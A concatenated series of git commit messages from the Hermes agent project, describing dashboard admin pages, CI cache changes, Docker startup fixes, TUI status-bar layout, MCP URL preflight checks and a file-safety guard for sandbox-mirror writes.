"first configured" — and keyless providers are always "configured".
Backend now annotates each provider with is_active (via the same
_is_provider_active helper the CLI 'hermes tools' picker uses) plus a
top-level active_provider summary. The panel prefers that signal before
falling back to first-configured/first.
Adds a frontend regression test (active provider is expanded on load)
and backend coverage (config reports is_active/active_provider; selecting
a provider round-trips into the next config read).
The /api/messaging/platforms endpoints (catalog, configure, test) shipped
with the desktop app but never got a dashboard UI; the recent admin-panel
PRs covered MCP/webhooks/hooks/system but skipped messaging channels. This
adds the missing page so all 20+ channels (Telegram, Discord, Slack, Matrix,
Mattermost, WhatsApp, Signal, BlueBubbles, Email, SMS, DingTalk, Feishu,
WeCom, WeChat, QQ Bot, Yuanbao, plugin platforms, etc.) can be configured,
enabled/disabled, tested, and connected entirely from the browser.
- web/src/pages/ChannelsPage.tsx: per-platform list with live status, enable
Switch, Test, and a Configure modal that renders each platform's exact
setup fields (secrets masked, required validated, redacted display).
- web/src/lib/api.ts: MessagingPlatform types + get/update/test client fns.
- web/src/App.tsx: /channels route + nav tab (Radio icon, after MCP).
- docs: Channels section + REST endpoints + screenshot.
Frontend-only — reuses the existing env-write + config-enable backend, which
auto-enables a platform once its required env vars are present and the
gateway restarts. No core changes, no new tool schema.
test_stale_m3_cache_dropped_and_reresolves_to_1m hardcoded
assert ctx == 1_000_000. The test re-resolves M3 through the live models.dev
registry (the seeded stale entry is dropped, so nothing short-circuits the
lookup), and models.dev now reports MiniMax-M3 at 512,000 — a change-detector
failure unrelated to any code change.
The guard's actual contract is: a stale <=204,800 catch-all value for an M3
slug must be DROPPED and re-resolved to M3's real (large) context. Both
sources satisfy that (hardcoded catalog 1,000,000; models.dev 512,000), so
assert the invariant (ctx > 204,800, stale value gone) instead of a literal
that external data can move. Renamed accordingly.
47/47 in test_minimax_provider.py pass.
Save the original working directory before init scripts cd to
/opt/data, then restore it before exec'ing the user command, so
the container starts in the Docker -w directory instead of /opt/data.
Adds regression test verifying cwd save/restore ordering in
main-wrapper.sh.
When a dispatcher-spawned worker (HERMES_KANBAN_TASK set) calls
kanban_create without an explicit workspace, the new child now inherits
the worker's own running-task workspace_kind/workspace_path instead of
defaulting to scratch. A worker editing a dir:/worktree project that
spawns a follow-up child keeps it in that project.
Orchestrators (kanban toolset, no HERMES_KANBAN_TASK) and CLI/dashboard
callers still default to scratch. An explicit workspace arg always wins.
* feat(dashboard): MCP catalog + enable/disable, webhook toggle, hook create/delete, system stats
Backend for the comprehensive admin pass:
- MCP: GET /api/mcp/catalog (browse Nous-approved optional-mcps), POST
/api/mcp/catalog/install, PUT /api/mcp/servers/{name}/enabled
- Webhooks: PUT /api/webhooks/{name}/enabled; gateway rejects disabled routes
with 403 (hot-reloaded, no restart)
- Hooks: POST/DELETE /api/ops/hooks — create (with consent approval) + remove;
list now reports accurate allowlist status + valid events
- System: GET /api/system/stats — OS/arch/python/cpu + psutil memory/disk/
uptime/process, stdlib fallback
All gated by dashboard auth; secrets never returned.
* feat(dashboard): MCP catalog UI, enable/disable toggles, hook create, system stats
- McpPage: catalog section (browse Nous-approved MCPs, one-click install with
env prompts) + per-server enable/disable toggle with gateway-restart note
- WebhooksPage: per-subscription enable/disable toggle (muted + badge when off)
- SystemPage: new Host stats section (OS/arch/python/cpu/mem/disk/uptime/load),
shell-hook create modal + delete, 'Create backup' label
- api.ts: client methods + types for catalog, toggles, hook CRUD, system stats
* test(dashboard): cover catalog, toggles, hook CRUD, system stats, webhook toggle
Adds tests for the comprehensive pass: MCP enable/disable + catalog list +
catalog-install-unknown, hook create/delete with consent, system stats shape,
and webhook enable/disable. 26 tests total, all green.
* docs(dashboard): document the comprehensive admin pass + fresh screenshots
Updates the MCP/Webhooks/Pairing/System sections for catalog browse+install,
enable/disable toggles, hook creation, and host system stats; adds the new
endpoints to the API table; replaces the screenshots with live captures of
the rebuilt pages (real data, no dummies) including the hook-create modal.
* feat(dashboard): curator, portal status, and prompt-size/dump/migrate ops
Closes the last in-scope CLI gaps from the coverage audit:
- Curator: GET /api/curator (status), PUT /api/curator/paused, POST
/api/curator/run (background)
- Portal: GET /api/portal (Nous auth + Tool Gateway routing, read-only)
- Diagnostics: POST /api/ops/prompt-size, /api/ops/dump, /api/ops/config-migrate
(backgrounded, tailed via action status)
Host-bound commands (secrets/proxy/lsp/acp/computer-use/desktop/completion/
postinstall/uninstall/claw) remain CLI-only by design.
* feat(dashboard): curator + portal + diagnostics UI, tests
- SystemPage: Nous Portal status section (auth + Tool Gateway routing),
Skill curator card (status + pause/resume + run now), and three new
Operations buttons (prompt size, support dump, migrate config)
- api.ts: client methods + CuratorStatus/PortalStatus types
- tests: curator pause/resume, portal shape, system-stats shape, + auth-gate
coverage for the new GET endpoints (31 tests total)
* docs(dashboard): document curator, portal, and diagnostics + refresh System screenshots
Updates the System section for the Nous Portal status, Skill curator
controls, and the new prompt-size/dump/migrate operations; adds them to the
API table; refreshes the System screenshots (now showing Portal + Curator)
and adds a dedicated curator/gateway/memory capture.
* feat(dashboard): session stats/export/prune + skills hub search endpoints
Completes the existing tabs' backend depth (audit vs CLI):
- Sessions: GET /api/sessions/stats (store stats), GET /api/sessions/{id}/export,
POST /api/sessions/prune. /stats is registered before /{session_id} so the
literal path isn't captured by the parameterized route.
- Skills: GET /api/skills/hub/search — parallel multi-source hub search (threaded),
returns installable identifiers
- (rename via PATCH and cron-edit via PUT already existed; now surfaced in UI)
* feat(dashboard): complete existing tabs — sessions mgmt, skills hub browse, cron edit
Audited every existing tab against its CLI command and filled the gaps:
- Sessions: store stats bar, per-row rename + export (JSON download), and a
prune-old-sessions control (mirrors hermes sessions rename/export/prune/stats)
- Skills: new 'Browse hub' view — search the skill hub across all sources,
install by identifier with a live install log, and 'Update all' (mirrors
hermes skills search/install/update)
- Cron: per-job Edit modal (pre-filled) calling updateCronJob (hermes cron edit)
- api.ts: renameSession/getSessionStats/exportSessionUrl/pruneSessions,
updateCronJob, searchSkillsHub + types
Models tab was already comprehensive (provider+model picker, dynamic per-provider
lists, main + all 11 aux-task assignments, reset) — verified, no change needed.
* test(dashboard): cover session stats/rename/export/prune + skills hub search
Adds the route-shadowing guard for /api/sessions/stats (must not be captured
by /api/sessions/{session_id}), rename/export/prune, and the empty-query
short-circuit for hub search. 36 tests total, all green.
* docs(dashboard): document enhanced Sessions, Skills hub, and Cron edit
Sessions: stats bar, rename, export, prune (+ screenshot). Skills: new Browse
hub view for search/install/update (+ screenshot). Cron: edit action. API
table updated with the new endpoints.
The arm64 PR build ran fully uncached because the previous gha cache
backend's short-lived Azure SAS token expired mid-build on slow
cold-cache arm64 runs and crashed before the smoke test. Uncached arm64
PR builds were ~45% slower than amd64 (median 553s vs 382s), making the
arm64 job the one most often cancelled on supersede — surfacing as a red
X in PR checks and reading as 'the arm64 build keeps failing'.
Switch arm64 to a registry-backed cache on ghcr.io
(type=registry, ref ghcr.io/nousresearch/hermes-agent:buildcache-arm64).
Its credential is the job-lifetime GITHUB_TOKEN, not a time-boxed SAS
token, so the cold-build-outlives-token failure mode cannot recur.
- PR builds: cache-from only (read-only) — warm layers, no write races,
no cache-ref pollution from rapid PR pushes.
- main/release builds: cache-from + cache-to (mode=max) to populate the
cache for subsequent PR/main builds and let the digest push reuse the
smoke-test build's layers.
- Add packages: write permission and a ghcr.io login for the cache.
amd64 keeps its gha cache: it builds fast enough to stay inside the SAS
token's lifetime, so it never hit this failure mode.
* fix(file-safety): extend sandbox-mirror guard to cover inner-container path (#32049)
Brian's shape-based guard (#32213) catches paths that still carry the
full sandboxes/<backend>/<task>/home/.hermes/… prefix on the host side.
The inner-container case is not covered: when file tools execute inside
Docker the bind-mount strips that prefix, so the guard receives plain
/root/.hermes/… and passes through. The root:root ownership on the
divergent SOUL.md in #32049 confirms this is the primary failure mode.
Add a ContextVar (_CONTAINER_HERMES_MIRROR) set by DockerEnvironment
when persistent=True. classify_container_mirror_target / get_container_
mirror_warning detect any write whose resolved path falls under that
prefix, using the same warning format and cross_profile=True bypass
contract as the existing guards. Chain the new guard in
_check_cross_profile_path after the two existing detectors.
* fix(file-safety): derive Docker mirror guard from task
---------
Co-authored-by: Ben <ben@nousresearch.com>
Non-dispatch gateways no longer open per-board kanban DBs for notifier
polling. Mirrors the existing dispatcher gate (config
kanban.dispatch_in_gateway, default True; env override
HERMES_KANBAN_DISPATCH_IN_GATEWAY) so multi-gateway setups collapse to a
single process holding kanban.db file descriptors.
Salvaged from PR #31964 by @steveonjava; tests and docs trimmed during
salvage.
Adopt the cleaner handling from PR #37080: coerce/strip the note and
skip the extra newlines when the underlying message (or text part) is
empty, while keeping the safer fail-open behavior for unknown shapes.
Regression coverage for the multimodal-message TypeError: note folding into
text parts, image-only insertion, empty-note passthrough, and unknown-shape
fail-open.
Sending an image to a vision model turns the user message into a list of
OpenAI-style content parts. When a /model or /reload-skills note was queued
for the same turn, the CLI did `note + "\n\n" + agent_message`, crashing the
agent thread with:
TypeError: can only concatenate str (not "list") to str
Repro: `/model gpt-5.5 --provider openai-codex`, then paste+send an image.
Add _prepend_note_to_message(), which folds the note into the first text
part of a content-parts list (or inserts a leading text part for image-only
messages) and keeps the plain-string path unchanged. Used for both the
model-switch and skills-reload notes.
The /model picker emitted a standalone slug=openai row (gated on
OPENAI_API_KEY). Selecting it ran resolve_provider_full("openai"),
which resolved the legacy providers.py alias openai->openrouter BEFORE
checking the user's own providers.openai config — silently switching
users onto OpenRouter (HTTP 401 when they have no OR key).
- model_switch.list_authenticated_providers: skip vendor names that are
aliases to an aggregator (isolates openai->openrouter; copilot/kimi/etc.
are real providers and unaffected). Kills the phantom picker row.
- providers.resolve_provider_full: user-config providers.<name> now wins
over the built-in alias table, so providers.openai (api.openai.com)
beats the alias.
- model_switch PATH A: user-config providers resolve credentials via
their own endpoint instead of the name-based runtime resolver that
doesn't know user-config slugs; plus a fail-loud guard for explicit
unauthed-aggregator hops.
Verified E2E with the reporter's config (no OR key): selecting OpenAI +
gpt-4o-mini now resolves to api.openai.com instead of openrouter.ai.
decompose_triage_task hardcoded every fan-out child to workspace_kind
'scratch', ignoring the root task's workspace. A code-gen task created
with a dir:/worktree: workspace would fan out into throwaway scratch tmp
dirs (GC'd on archive), so generated code never landed in the project.
Children now inherit the root's workspace_kind + workspace_path. A child
dict may still override with its own workspace_kind/workspace_path; the
path only carries over when kinds match. Scratch roots are unchanged.
Collapse the per-type observed-media dispatch into one platform-agnostic
cache_media_bytes() helper in gateway/platforms/base.py. Any adapter can now
hand it raw attachment bytes + a filename/MIME hint; it classifies against the
shared MIME registries, routes to the right cache_*_from_bytes helper,
sandbox-translates the path, and returns a CachedMedia with a ready
context_note(). Telegram's observed-group path shrinks to: size-gate, download,
call the helper, annotate. Also dedupes the addressed-media type ladder into
_media_message_type().
Net: contributor's Telegram-only +595 LOC becomes a +210/-32 production change,
with the reusable primitive available to Discord/Slack/Signal/etc.
Co-authored-by: Glucksberg <markuscontasul@gmail.com>
Follow-up to the salvaged terminalBackground commit:
- align the CSS-var fallback and type doc to the runtime default (#000000)
- revert web/package-lock.json to main (the original commit stripped peer
flags as an npm-version artifact, unrelated to the feature)
Wires the xterm.js terminal pane background color into the theme
system. Previously hardcoded as #0d2626; now reads from
DashboardTheme.terminalBackground with #000000 as default.
Users can override via ~/.hermes/dashboard-themes/*.yaml:
terminalBackground: "#1a0a2e"
Skills discovery surfaced ~136 of 88k skills in the CLI and gave community
skills no clickable source on the docs page. Three coupled fixes:
CLI browse:
- hermes skills browse capped at 50 because the per-source limit dict had no
'hermes-index' key — when the centralized index is available the router
skips external APIs and serves only the index, so the default-50 fallthrough
silently truncated the whole hub. Add hermes-index: 5000. Browse now loads
5367 (269 pages) instead of 136.
- Add an Identifier column + install/inspect hint to the browse table so users
can act on what they see without a second 'search'.
- Route the TUI browse_skills() helper through parallel_search_sources so it
inherits the same index-aware source-skip (was double-counting); expose
identifier in its output.
Docs Skills Hub page:
- Synthesize a sourceUrl for every community skill (github tree URL, clawhub /
skills.sh / lobehub / browse.sh detail pages), preferring the adapter's
explicit extra.detail_url/source_url/repo_url. Expanded cards now show
'View source' for community skills (was nothing) and keep 'View full
documentation' for built-in/optional. 99% coverage.
- Add a Copy button on the install command.
- Add a loading state instead of flashing '0 skills / No skills found' while
the 45MB catalog fetches.
Category cleanup:
- _guess_category fell back to tags[0] verbatim, producing ~430 junk one-off
categories (version strings, brand names: '0.10.7 Dev', 'Doramagic Crystal').
Now only curated buckets are accepted; unknowns fold into 'Other'. Widen the
tag->category map so common community tags route to real buckets. 430 -> 173
categories, top 20 all meaningful.
Tests: tests/website/test_extract_skills.py covers _source_url synthesis +
precedence and _guess_category curation (13 tests). All 27 skills-hub CLI
tests still pass. Docusaurus build verified; expanded cards confirmed in
browser for both community (View source) and built-in (View full docs).
Salvages 8 distinct fixes from a batch of PRs by @kyssta-exe, reapplied
onto current main (original branches were stale) with a few refinements.
- cron(jobs.py): load_jobs() validates top-level JSON shape — a bare
list auto-repairs into the {"jobs": [...]} dict; scalars/null raise a
clear RuntimeError instead of an uncaught AttributeError that took
down the whole cron subsystem (#37065, closes#36867).
- web(web_server.py): close the per-action log file handle after Popen
so the parent stops leaking one fd per spawned action (#36843).
- web(web_server.py): DELETE /api/env returns 400 for invalid key names
instead of a misleading 500, mirroring PUT /api/env (#36840).
- gateway(gateway.py): read /proc/<pid>/cmdline inside a with-block so
the fd is released immediately instead of relying on GC (#36804).
- web-tools(web_tools.py): include "xai" in check_web_api_key() so a
configured X.AI web backend reports as available (#36802).
- compression(conversation_compression.py): mark the feasibility check
done only after it completes, and default the gate to "not checked"
if the attribute is missing (#36803).
- completion(completion.py): replace `ls` with directory globbing in the
generated bash/zsh/fish profile listers — handles names with spaces
and skips non-directory entries (#36806).
- terminal-tool(terminal_tool.py): drop a duplicate `import threading`
(#36808).
- claw(claw.py): the migrate recommendation now points at the real
`hermes gateway stop` command instead of the non-existent
`hermes stop` (#36795, #36796, closes#36771).
- tests: guard against a leaked HERMES_CRON_SESSION breaking gateway
approval tests — add it to the hermetic conftest unset list (root
cause, protects every test) and pop it in the affected test's
setup_method (#36796).
Co-authored-by: kyssta-exe <kyssta-exe@users.noreply.github.com>
Reworks the content-type preflight so a misconfigured HTTP MCP url (a web-app
root serving HTML) fails in <1s instead of hanging the full 60s connect_timeout
— and does so non-retryably, which neither original PR achieved.
- Allow-list detection (application/json, text/event-stream) instead of a
text/html-only denylist — catches text/plain, application/xml, etc.
- New NonMcpEndpointError(ConnectionError); run() catches it in the same
top-level fast-fail block as InvalidMcpUrlError, so it returns before the
reconnect-backoff loop (truly non-retryable) and the probe runs once, not
on every reconnect.
- Probe runs on its own httpx client OUTSIDE the SDK anyio task group, so the
error propagates as itself rather than wrapped in an ExceptionGroup (the
trap that made the in-SDK event-hook approach a no-op).
- Forwards ssl_verify + client_cert + headers; HEAD->GET fallback on 405/501;
best-effort pass-through on missing content type, non-2xx, and network
errors; skips SSE transport. CancelledError is never swallowed.
- Replaces the malformed test file (which never imported the real method and
failed CI) with 21 tests driving the actual _preflight_content_type against
a real local HTTP server, plus full run() integration verifying <1s
non-retryable failure.
Co-authored-by: liuhao1024 <sunsky.lau@gmail.com>
Co-authored-by: uzunkuyruk <egitimviscara@gmail.com>
A misconfigured MCP server URL that returns text/html (e.g. pointing at
a web app root instead of an MCP endpoint) causes the MCP SDK to block
for the full connect_timeout (default 60 s) before surfacing
CancelledError.
Add a lightweight HEAD pre-flight check that detects text/html responses
in ≤5 s and raises ConnectionError with an actionable message. Non-HTML
responses, missing headers, and network errors pass through silently so
the normal MCP handshake proceeds unaffected.
Fixes#36052
* feat(tui): single /model command + unified Sessions overlay
Collapse the redundant `/provider` alias so `/model` is the only name
everywhere (it already drove the same 2-step ModelPicker in the TUI).
Merge the separate `/resume` (cold history browser) and `/sessions` (live
switcher) surfaces into one Sessions overlay reached by `/resume`,
`/sessions`, `/session`, and `/switch`. It pins a "+ new" row at the top
(always visible), lists live sessions with status, and lists resumable
history below — dispatching session.activate for live rows vs resume for
cold ones, with close/delete in place. Fixes `/session` opening an empty
live-only switcher and the hidden new-session affordance.
* Potential fix for pull request finding
Co-authored-by: Copilot Autofix powered by AI <175728472+Copilot@users.noreply.github.com>
* fix(tui): address Copilot review on the Sessions overlay
- Track the armed history-delete by session id instead of row index so the
1.5s live-status poll re-indexing rows can't redirect the second `d` to a
different session.
- Re-add the busy-session guard to immediate `/resume <id>` and `/sessions new`
actions (browsing the bare overlay stays allowed) so resuming/switching can't
corrupt an in-flight turn's streaming/busy state.
* fix(tui): guard cold-resume (not live-switch/new) from the Sessions overlay
Copilot flagged that overlay actions bypassed the busy guard. Only cold
resume actually closes the current session, so only it is guarded — both
from the slash path and now from the overlay (appActions.resumeById).
Switching between live sessions and starting a `+ new` live session keep
the current session running in the background, so they stay unguarded:
that concurrency is the orchestrator's whole purpose. Also dropped the
over-broad guard on `/sessions new` for the same reason.
* fix(tui): address Copilot review (history dedup + desktop /provider)
- The 1.5s poll now re-derives the resumable list from the RAW session.list
results (rawHistoryRef) against the current live set, so a session hidden
while live reappears in history once it closes — instead of being lost
until a full reload. Delete also prunes the raw ref.
- Drop the dead `/provider` entry from the desktop PICKER_OWNED_COMMANDS now
that the alias is gone, so the desktop client no longer advertises it.
* fix(tui): surface session.list errors + keep selection stable across polls
- A garbled session.list response now surfaces an error and preserves the
last good raw history, instead of silently blanking the resumable section.
- The 1.5s poll re-anchors the selection to the same row by session id
(live or history) when the live list grows/shrinks, so the highlight no
longer drifts to a different row mid-interaction.
* fix(tui): degrade session.list independently + cover overlay helpers
- Fetch active_list and session.list via Promise.allSettled so a failing
session.list no longer rejects the whole load: live sessions still render
and only the resumable history degrades (with an error).
- Add unit tests for the new helpers (sessionRowKindAt row ordering,
resumableHistory dedupe, sessionsCountLabel, relativeSessionAge).
* test(tui-gateway): assert /provider alias is gone, /model remains
The CI test_complete_slash_includes_provider_alias asserted the removed
`/provider` alias still autocompleted. Flip it to lock in the removal:
`/pro` no longer offers `provider`, and `/mod` still completes `model`.
---------
Co-authored-by: Copilot Autofix powered by AI <175728472+Copilot@users.noreply.github.com>
FaceTicker now takes the indicator style as a prop (same value used by
busyIndicatorWidth) instead of reading the store independently, so the
rendered busy indicator and its reserved width can't desync on /indicator
changes.
Inside an s6 container, `gateway run` redirects to the supervised
gateway and then keeps the CMD process alive as a no-op heartbeat so
/init doesn't start stage-3 shutdown. That heartbeat is
`os.execvp("sleep", ["sleep", "infinity"])`, which does a PATH lookup
for the `sleep` binary. When PATH was empty/truncated/clobbered at that
point — e.g. after user customizations rewrote PATH, or on a minimal
image without `sleep` on PATH — the exec raised FileNotFoundError,
killing the CMD process and causing /init to tear down every service:
the container failed to start (issue #36208, a regression in the s6
image from 2026.5.28).
Wrap the exec in try/except OSError: on success it still replaces the
process with the cheap `sleep` heartbeat (no resident Python
interpreter, and the existing process-tree/recursion contract is
preserved); on failure it falls back to `_block_until_terminated()` —
a SIGTERM handler (clean 128+signum exit on `docker stop`) plus a
signal.pause() loop, which needs no external binary and so can't fail
on PATH state. A threading.Event().wait() fallback covers platforms
without signal.pause().
Keeping execvp as the primary path (rather than replacing it outright)
preserves the `sleep infinity` heartbeat that the docker integration
tests assert (test_gateway_run_supervised.py) and avoids leaving a
full Python interpreter resident for the container's lifetime.
Verified end-to-end on a built image: with execvp forced to fail,
_block_until_terminated() blocks cleanly instead of raising
FileNotFoundError; normal boot still runs the cheap `sleep infinity`
heartbeat; the 6 test_gateway_run_supervised.py integration tests pass.
Salvages the two community fixes for this issue — the fallback design
from #36221 (@Pluviobyte) and the signal.pause() heartbeat from #36267
(@karmeleon) — and adds regression tests for both the normal and
sleep-missing paths.
Co-authored-by: Pluviobyte <Pluviobyte@users.noreply.github.com>
Co-authored-by: karmeleon <karmeleon@users.noreply.github.com>
Closes#36208.
Reverts the shared fmtCwdBranch default (28 → 40) so it isn't an API/
behavior change for other callers, and instead passes max=28 explicitly
from the status-bar caller where the tighter cap is intended.
Collapse the three mention-parsing helpers into one _compile_mention_patterns
that handles list/string/None inputs, and inline the require_mention bool
coercion to match the signal/dingtalk convention. Same behavior, 16 fewer
lines, no per-instance state in the staticmethod.
- Render SpawnHud last in the tail so its un-budgeted (dynamic) width can
only truncate itself, never push budgeted segments past leftWidth.
- Precompute kaomoji/emoji frame widths once at module load instead of
rescanning FACES/EMOJI_FRAMES on every status render.
- Correct the tail-priority comment to match the actual fits() order
(bar, duration, compressions, voice, session count, bg, cost).
fmtDuration renders a space between units (e.g. `59m 59s`), so the flat
6-col reservation under-counted and could let the elapsed-time tail shove
the model off-screen / break the whole-segment budget. Reserve the bounded
clock width from fmtDuration itself (MAX_DURATION_WIDTH) in both the busy
indicator reservation and the tail duration budget.
* feat(desktop): session hygiene, archive, media streaming + connecting overlay
Address a batch of desktop feedback:
- Stop leaking empty "Untitled" sessions: the TUI gateway pre-created a DB
row on every session.create (i.e. every launch/draft). Persist the row
lazily on first prompt instead, and hide message-less rows in the sidebar.
- Archive/hide sessions: new `archived` column + set_session_archived, web
API (`?archived=` + PATCH archived), Ctrl/⌘-click and a context-menu item
in the sidebar, and an "Archived Chats" settings panel to restore/delete.
- Videos load via a streaming `hermes-media://` protocol instead of capped,
in-memory data URLs (16 MB limit) — bypasses the cap and supports seeking.
- Background-process completions route to the session that launched them:
the completion event now carries session_key and each poller only consumes
its own.
- Sidebar: "Group by workspace" toggle is always visible; each workspace
group gets a "+" to start a session in that directory; "New agent"/"Agents"
relabeled to "New session"/"Sessions".
- New gateway connecting overlay (ascii decode → fade out) replacing the bare
skeleton/"starting gateway" state.
* fix(desktop): bail connecting overlay on boot error
The shownRef latch kept the connecting overlay mounted behind
BootFailureOverlay after a hard boot failure. Return null on boot.error
so the failure recovery surface fully owns the screen.
* fix(desktop): address Copilot review
- /api/sessions: validate `archived` (400 on unknown) and return `archived`
as a JSON boolean instead of SQLite's 0/1.
- PATCH /api/sessions/{id}: 400 (not a misleading 404) when the body has no
updatable fields; stop conflating a no-op with "not found".
- hermes-media protocol: drop `bypassCSP` — streaming only needs
secure/standard/stream/supportFetchAPI.
- Sidebar workspace header: split the toggle and the "+" into sibling buttons
so we no longer nest interactive elements inside a <button>.
* fix(desktop): address Copilot re-review
- hermes-media protocol: restrict streaming to an audio/video extension
allowlist (415 otherwise) so it can't be used to read arbitrary local files.
- Connecting overlay: use z-[1200] instead of the non-standard z-1200 utility.
* Potential fix for pull request finding
Co-authored-by: Copilot Autofix powered by AI <175728472+Copilot@users.noreply.github.com>
---------
Co-authored-by: Copilot Autofix powered by AI <175728472+Copilot@users.noreply.github.com>
The bootstrap installer's build.rs unconditionally baked a commit pin via
`git rev-parse HEAD`, forcing every dev build to clone an exact SHA at
install time. That SHA had to be pushed to origin or the fresh-box clone
would fail.
Make the commit pin opt-in: by default build.rs bakes ONLY the detected
branch, so the installer follows that branch's HEAD at install time. Set
HERMES_BUILD_PIN_COMMIT (SHA, tag, or branch name) to bake an immutable
commit pin for reproducible/release builds; it is resolved to a SHA via
`git rev-parse --verify <ref>^{commit}` and fails loud on an unresolvable
ref. Runtime resolution already supported branch-only pins, so no changes
needed in bootstrap.rs / install_script.rs / install.ps1.
The previous reservation set the left box width but everything still
shared one flex row, so the lower-priority tail + cwd could still shrink
`ready`/model down to fragments ("re"). Pin the essentials (indicator +
model + context) in a non-shrinking group, and render the tail segments
(bar, duration, compressions, voice, session count, bg, cost) only when
the whole segment fits in the leftover space — in priority order — so
nothing truncates mid-segment and the low-value tail drops first.
Also shrink the cwd/branch label (max 40 → 28) so it stops dominating the
bar on roomy-but-not-huge terminals.
#32049 reports that under terminal.backend: docker, write_file / patch
calls to authoritative profile state (SOUL.md, memories, etc.) land on
the sandbox-local mirror at
``<HERMES_HOME>/profiles/<name>/sandboxes/<backend>/<task>/home/.hermes/...``
— a path the host Hermes process never reads. The tool reports success,
the user sees no behavior change, and on disk two divergent copies of
SOUL.md (or any other profile file) accumulate.
The existing classify_cross_profile_target guard does not catch this:
its parts[2] check sees "sandboxes" and returns None, and the path is
in-profile from the inner-mirror perspective so even a fixed version
would not fire.
Add a parallel sandbox-mirror classifier in agent/file_safety:
* classify_sandbox_mirror_target() detects the
``…/sandboxes/<backend>/<task>/home/.hermes/…`` shape via path parts.
Detection is path-shape only — backend-agnostic, does not require
the file to exist, and works regardless of which HERMES_HOME resolves.
* get_sandbox_mirror_warning() returns a model-facing warning that
names the mirror root and the inner authoritative path the agent
likely meant.
Wire both detectors through tools/file_tools._check_cross_profile_path
so the existing write_file and v4a patch call sites pick up the new
guard with no API change. The bypass kwarg (``cross_profile=True``)
remains shared between the two guards — same "I know what I'm doing"
escape valve after explicit user direction.
This is the defense-in-depth piece of the proposal in #32049 ("any
…/sandboxes/<backend>/…/home/…hermes/… path as sandbox-mirror"). It
catches the host-side speculation case where the agent writes a literal
sandbox-mirror path. The inner-container case (where the bind mount
strips the ``sandboxes/`` prefix from the agent's path view) is out of
scope for this surgical change — that requires either a dispatch-layer
host-side check before the container handoff, or the host-side
``profile_state`` / ``soul`` tool the issue also proposes.
Soft guard, NOT a security boundary — matches the existing
classify_cross_profile_target contract.
Co-authored-by: briandevans <252620095+briandevans@users.noreply.github.com>
Co-authored-by: Ben Barclay <ben@nousresearch.com>
The left-content reservation used a flat constant for the busy face,
but its width varies by /indicator style: kaomoji is a wide glyph plus
a rotating verb, while unicode is a bare 1-col braille spinner with no
verb. Reserve the real width via busyIndicatorWidth(style, hasDuration)
so the model stays on-screen across styles without over-reserving the
unbounded elapsed-time tail.
The status rule reserved only 8 cols for the left segments, so the
cwd + git-branch label on the right could grow until the loading
indicator, model, and context read-out were crushed to almost nothing
(sometimes collapsing to a single illegible line) on small screens.
Reverse the priority: `statusRuleWidths` now reserves the display width
of the must-keep left content (status indicator + model + context) so
the cwd/branch segment truncates first. Add `statusBarSegments(cols)`
progressive disclosure — as the terminal narrows the low-priority tail
sheds in order (cost → bg → voice → compressions → duration → context
bar), and below the bar breakpoint the context read-out collapses to a
bare token count. Status and model are always guaranteed room.
Default `minLeftContent = 0` keeps `statusRuleWidths` byte-identical for
existing callers.
The dashboard Update button's backend guard (#36263) already returns a
structured {ok:false, error:"docker_update_unsupported", message,
update_command} envelope (HTTP 200) when running in a Docker install,
instead of surfacing a raw SystemExit. But the frontend ignored that
envelope: runAction() only branched on a thrown error, so the 200 fell
through to the action-status poll, which reported a generic
"Action failed (exit 1)" toast and never showed the actual guidance.
Now runAction() inspects the update response and, on the
docker_update_unsupported case, surfaces the backend's guidance message
plus the recommended re-pull command directly (success-styled, since it's
actionable guidance — not a crash) without starting the poll.
Closes#34347.
Cron delivery to WeChat fails with 'Timeout context manager should
be used inside a task' because _api_post and _api_get use aiohttp's
ClientTimeout directly. When the cron scheduler calls send() via
asyncio.run_coroutine_threadsafe(), aiohttp cannot find a running
task and raises RuntimeError.
_upload_media, _download_bytes, and _download_remote_media already
use asyncio.wait_for() to avoid this. Apply the same pattern to
_api_post and _api_get — the two remaining iLink API helpers that
still use the raw ClientTimeout approach.
This fixes cron delivery errors seen on the WeChat platform adapter
when meyo-external cron jobs attempt to deliver output to WeChat.
The extract pipeline (extract_media/extract_images/extract_local_files +
directive strips) can reduce a non-empty tool-using response to empty
text_content with no deliverable attachment. The 'if text_content' send
guard then silently skips delivery: a 'response ready' log with no
'Sending response', no error, and the answer never reaches the user.
- A2: snapshot the pre-extract response; when extraction yields empty text
and no image/local/media attachment, deliver the recovered original from
the post-extract_media body (so a spaced MEDIA path can't leak). Applies
on ALL platforms (supersedes the Discord-only #33842 and the unsafe
raw-fallback #29499).
- A3: loud delivery invariant - a non-empty response that produces nothing
deliverable logs response_delivery_dropped at ERROR; every recovery logs
response_delivery_recovered. No silent drop survives.
- Factor a _strip_media_directives helper for the [[...]] strips; MEDIA
stripping stays owned by extract_media, whose grammar handles spaced and
quoted paths.
- Salvaged + de-scoped the #33842 test harness to all platforms; added
unrecoverable-drop and no-leak regression tests.
A streamed preamble ("Let me search...") finalized at a tool boundary
routed through _try_fresh_final, which unconditionally set
_final_response_sent=True even though it is a NON-final segment. The
gateway then reads that flag as "final delivered" and suppresses the
genuine final answer produced on the next API call, so the user silently
gets nothing. Only reproduces with fresh_final_after_seconds > 0.
- _try_fresh_final / _send_or_edit take is_turn_final; the segment-break
call site passes is_turn_final=got_done so only the turn-final answer
marks final-delivered.
- _reset_segment_state clears the final-delivery flags at every tool
boundary as defense-in-depth against any future premature setter.
- Failing-first regression + happy-path no-duplicate test.
Sourced from X/Twitter, blogs (Medium/Substack/dev.to), and YouTube since the
last refresh. Deduped against the existing 237 entries by id, url, and author.
237 -> 262 stories.
Highlights: 24/7 Mac Mini agent at $21/mo (@witcheer), automated TikTok
slideshow factory (@cyrilXBT), per-client isolated profiles as an AI-ops
business (@IBuzovskyi), PM briefing 20->8min (@aakashgupta), Railway+Telegram
deploy gotchas (Tessa Kriesel), compounding-cost field report (chintanonweb),
18-agent Kanban fleet (Tonbi), and several daily-automation setups.
Wires the salvaged search helpers into the shared curses menu driver and
turns on type-to-filter for the CLI model pickers (the 100+ model lists
that previously required scrolling).
- Search lives in the shared `_run_curses_menu` driver behind a
`searchable` flag + `search_labels`, so both `curses_radiolist` and
`curses_single_select` get it without per-menu duplication. `/` opens
the filter, BACKSPACE edits, Ctrl+U clears, ESC clears the filter then
cancels. Returned values are always original item indices.
- `_filter_indices` RANKS matches (best-first) via a Python port of the
TS scorer in ui-tui/src/lib/fuzzy.ts and web/src/lib/fuzzy.ts. The port
is byte-identical in score: same per-char bonuses, prefix (+8) and
exact (+20) bonuses, camelCase/word-boundary detection (matching on the
lowercased target, boundary on the original case), and the -len*0.01
length tiebreak — so the CLI, TUI, and WebUI rank results identically.
